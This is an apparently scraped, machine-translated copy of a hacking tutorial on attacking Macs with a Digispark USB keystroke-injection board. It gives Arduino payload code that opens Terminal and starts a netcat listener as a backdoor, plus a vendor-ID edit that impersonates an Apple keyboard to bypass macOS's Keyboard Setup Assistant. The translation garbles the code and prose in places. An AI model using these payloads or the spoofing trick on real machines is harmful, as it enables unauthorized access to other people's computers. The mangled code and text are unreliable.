قالب وردپرس درنا توس
Home / Tips and Tricks / How to Hack MacOS with Digispark Ducky Script Payloads «Null Byte :: WonderHowTo

How to Hack MacOS with Digispark Ducky Script Payloads «Null Byte :: WonderHowTo



The USB Rubber Ducky and the Digispark board both have the same problem when attacking MacOS computers: a pop-up window with keyboard profiles that tries to identify non-Apple USB keyboards. Although an annoying setback, the solution is a simple modification that can be used to address Mac computers, which affects the ability to address Windows and Linux devices. The Apple keyboard attaches to a MacBook Mac Pro, iMac, etc. connected to try to identify the newly connected keyboard. This secret security feature, which lurks in the background on all MacOS devices, protects against malicious user data from devices like a USB Rubber Ducky worth $ 50 or Digispark. But it can easily be bypassed if the Mac thinks your attack device is an Apple device.

On Amazon: 5 Digispark ATtiny85 Micro USB Development Boards for Arduino for 10.99 USD

MacOS Vs. In the battle between Macs and HID attacks (Human Interface Device), we have macOS on one side with the Profiler Keyboard Setup Assistant. The Digispark and the USB Rubber Ducky are on the other side with a macOS payload for Rickroll users.

When we insert one of the two HID tools into the macOS computer, we are greeted by our nemesis, the keyboard profiler, before the payload has a chance to run.

You can think of the Keyboard Setup Assistant as Clippy. It should help, but complicates the matter. Attempting to navigate through the tool is also terrible because the keyboard is not always rendered correctly. For example, sometimes you need to press the keys again to profile the keyboard, which will not work for a device that can not respond to feedback. Instead, it's better to work around this than to worry about it at all.

Banishing the Keyboard Profiler

To remove the Profiler from the Keyboard Setup Wizard, we must identify what he is complaining about. Deep in the configuration files of the Digispark library, the cause of our problem lies in the configuration option shown below.

  / * ---------------------- ---- Device Description ------------------ --------- * /

#define USB_CFG_VENDOR_ID 0xc0, 0x16
/ * USB manufacturer ID for the device, low byte first. If you have your registered
* Own Vendor ID, define here. Otherwise, you can use one of obdev's free
* Shared VID / PID pairs. Be sure to read the file USB-IDs-for-free.txt for rules!
* *** IMPORTANT NOTICE ***
* This template uses obdev's common vid / pid pair for vendor class devices
* with libusb: 0x16c0 / 0x5dc. Use this VID / PID pair ONLY if you understand this
* the implications!
* / 

The problem here is that the vendor ID of "0xc0, 0x16" is not Apple. Therefore, Apple does not trust it and causes the Keyboard Setup Assistant to identify the intruder. To fix the problem, you can access the Digispark library configuration options and change the vendor ID to the value of an Apple device. It still works with non-Apple devices, and the keyboard setup wizard is never activated because macOS believes it is recognized as an Apple product colleague.

What you need

Join in with a Digispark board. They can be purchased online for $ 2 to $ 4 at Amazon or Walmart. AliExpress prices are even lower. Digistump, the official Digispark store, is currently sold out and will be available in early 2020.

The connection to the Digispark may be slightly different depending on the operating system used. For more information and troubleshooting tips, see the DigiSpark Wiki Documentation.

Step 1: Install and Configure the Arduino IDE for the Digispark

Let's say you have Arduino IDE installed support for the Digispark board. I've covered this process in detail in the previous tutorial on running USB Rubber Ducky scripts on a Digispark. Therefore, perform step 1 before proceeding to step 2.

Step 2: Build a Payload and Customize It for MacOS

] First we'll work with the standard payload " RickRoll_Update" provided by CedArtic on GitHub. In the first actions of the payload, the keys KEY_R and MOD_GUI_LEFT are used together to start a search window. However, this does not work on macOS because the hotkeys are different.

  // This DigiSpark script opens Rick Astleys - Never give up and also a
// fake Windows Update screen and then maximize with F11
#include "DigiKeyboard.h"
void setup () {
//empty
}
void loop () {
DigiKeyboard.delay (2000);
DigiKeyboard.sendKeyStroke (0);
DigiKeyboard.sendKeyStroke (KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay (600);
DigiKeyboard.print ("https://youtu.be/dQw4w9WgXcQ?t=43s");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);
DigiKeyboard.sendKeyStroke (KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay (3000);
DigiKeyboard.print ("http://fakeupdate.net/win10u/index.html");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (2000);
DigiKeyboard.sendKeyStroke (KEY_F11);
for (;) {/ * empty * /}
} 

To change this, you must change the keyboard shortcut of a Mac – the spacebar and the – KEY_SPACE or MOD_GUI_LEFT command key. Let's also change the payload so that the terminal opens, a Netcat backdoor is enabled, the Spotlight search is reopened, and Rickroll runs. By opening a Netcat backdoor via Rickrolling we can send them garbage over the network.

  #include "DigiKeyboard.h"
void setup () {
//empty
}
void loop () {
DigiKeyboard.delay (2000);
DigiKeyboard.sendKeyStroke (0);
DigiKeyboard.sendKeyStroke (KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay (600);
DigiKeyboard.print ("Terminal");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);
DigiKeyboard.print ("nc -l 9999");
DigiKeyboard.delay (1000);
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (600);
DigiKeyboard.sendKeyStroke (KEY_SPACE, MOD_GUI_LEFT);
DigiKeyboard.delay (600);
DigiKeyboard.print ("https://youtu.be/dQw4w9WgXcQ?t=43s");
DigiKeyboard.sendKeyStroke (KEY_ENTER);
DigiKeyboard.delay (5000);

for (;) {/ * empty * /}
} 

Perfect. The ".sendKeyStroke (KEY_SPACE, MOD_GUI_LEFT);" Line 8 invokes the Spotlight search bar. Line 10 ".print (" terminal ");" Searches for terminal while ".sendKeyStroke (KEY_ENTER);" open it. Line 13's ".print" ("nc -l 9999"); type in the netcat command and press Enter again so we can do what we want on the Mac. Then the Spotlight search reopens and searches for the YouTube video.

You can stop here because the video plays directly in Spotlight Search. However, if you type it opens in a browser for a larger view. Elegant.

Pro Tip: Find the key names for Digispark.

If you want to use Digispark to press different keys on the keyboard, use the following commands to open the Digikeyboard.h file, which lists all the names you can use, such as "Digikeyboard.h". KEY_ENTER, KEY_ARROW_LEFT, MOD_CONTROL_LEFT, etc.

Under macOS:

  ~ $ nano ~ / Library / Arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / Digikeyboard .h 

Under Linux:

  ~ $ nano ~ / .arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / Digikeyboard.h 

Step 3: Change the file usbconfig.h

Now you need we change the configuration file before we can transfer the code. Open a terminal window and change the following file to Nano.

Under macOS:

  ~ $ nano ~ / Library / Arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / usbconfig.h 

Under Linux:

  ~ $ nano ~ / .arduino15 / packages / digistump / hardware / avr / 1.6.7 / libraries / DigisparkKeyboard / usbconfig.h 

Navigate to the part of the file that defines the file. In the following line, look for the USB device name. ID.

  #define USB_CFG_VENDOR_ID 0xc0, 0x16 

Now change the values ​​as shown in the following example, which represents an ID for an Apple device, and save the file.

  #define USB_CFG_VENDOR_ID 0xac, 0x05 

The section should now look like this:

  / * -------------------------- Device description --------------------------- * /

#define USB_CFG_VENDOR_ID 0xac, 0x05
/ * USB manufacturer ID for the device, low byte first. If you have your registered
* Own Vendor ID, define here. Otherwise, you can use one of obdev's free
* Shared VID / PID pairs. Be sure to read the file USB-IDs-for-free.txt for rules!
* *** IMPORTANT NOTICE ***
* This template uses obdev's common vid / pid pair for vendor class devices
* with libusb: 0x16c0 / 0x5dc. Use this VID / PID pair ONLY if you understand this
* the implications! 

Once this is done, any code we send to Digispark should prompt him to identify himself as an Apple device.

Step 4: Push Payload and Test

We need to send the code to Digispark to make sure it works. In Arduino IDE, click the right arrow in the upper left corner of the Script window. The code is compiled. In the bottom window, Arduino tells you to turn on the Digispark within 60 seconds.

If you see the issue as below, you've made it! If not, disconnect and try the upload again. You may also need to adjust the Digispark in the USB port to connect.

For the full impact of the payload, check out the video above. We ran a binary file over the network, which caused a lot of noise and alarming text to scroll across the screen, but you can do anything you want.

MacOS payloads for the Digispark can be easily created

While macOS seems to have a security advantage over computers that are easily victimized by HID attacks, the benefit is negligible at best. Thanks to our simple modification, each computer can be targeted, and macOS is just as vulnerable if it thinks it is communicating with another Apple device.

Close your laptop if you leave it unattended Be sure to accidentally connect a Digispark. Unlike the USB Rubber Ducky, which is intended to be used as a USB flash drive, the Digispark is suspicious and alarming and is therefore often a better tool for developing payload than actually providing it.

I hope you have enjoyed this guide Set up the inexpensive Digispark to attack MacOS devices! If you have questions about this Digispark configuration tutorial, leave a comment below and feel free to contact me on Twitter @KodyKinzie .

Do not Miss: Change the Ducky with Custom Firmware

Save on this holiday weekend with our most popular Black Friday deals for smartphones, headphones, chargers, accessories, TVs, and more.

Cover photo and screenshots of Kody / Null Byte




Source link